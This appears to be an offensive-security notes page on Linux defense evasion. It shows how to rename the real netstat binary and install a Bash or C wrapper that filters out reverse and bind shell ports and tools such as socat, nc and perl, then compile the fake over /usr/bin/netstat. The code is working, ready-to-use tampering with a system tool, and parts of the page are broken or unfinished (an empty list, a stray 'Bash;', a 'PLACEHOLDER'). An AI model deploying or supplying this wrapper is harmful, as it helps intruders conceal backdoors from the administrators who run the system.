Secondary Categories: 02-Defense Evasion

There are a lot of different methods on Linux to view connections we can simply hide these by using one of two methods:

Both of these methods rely on original binary still on the system so what we can do is move the file and change it to another name. Then placing out new binary or script in a path before the original file.

#We are moving the orginal 
mv /bin/netstat /usr/sbin/ns.bak

Bash;

In this case we just the $@ in this ensure that any parameters passed by the user is also passed through.

#!/bin/bash
/usr/sbin/ns.bak \$@ | grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'

C

In the example below we can use the following code grep to filter out any common ports we use for bind shells or reverse shells

int main(int a,char**b){
  char*c[999999]={"sh","-c","/usr/sbin/ns.bak \$*|grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'"};
  memcpy(c+3,b,8*a);
  execv("/bin/sh",c);
}

Compiling the binary:

gcc -xc /tmp/.netstat.c -o /usr/bin/netstat

Also Check Out:

  • PLACEHOLDER